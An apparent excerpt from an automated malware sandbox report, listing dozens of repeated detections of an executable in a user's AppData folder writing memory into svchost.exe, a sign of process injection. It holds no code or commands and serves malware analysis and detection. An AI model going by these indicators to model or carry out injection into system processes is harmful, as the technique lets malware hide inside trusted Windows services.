Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010088Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001008CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010090Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010094Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010098Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001009CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100A0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100A4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100A8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100ACJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100B0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100B4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100B8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100BCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100C0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100C4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100C8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100CCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100D0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100D4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100D8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100DCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100E0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100E4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100ECJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100F0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100F4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100F8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100100FCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010100Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010108Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001010CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010110Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010114Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010118Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001011CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010120Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010124Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010128Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001012CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010130Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010134Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010138Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001013CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010140Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010144Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010148Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001014CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010004Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010008Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001000CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010010Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010180Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010184Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010188Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001018CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010190Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010160Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010164Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010168Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001016CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010170Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010178Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010154Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10010158Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 110000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: C0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 360000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 60000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: EE2104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10000000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10001000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10022000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 10022000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BA000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BA000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BB000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BB000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BC000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 100BC000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A038Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A03CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A040Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A044Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A048Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A04CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A050Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A054Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A058Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A05CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A060Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A064Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A068Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A06CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A070Jump to behavior
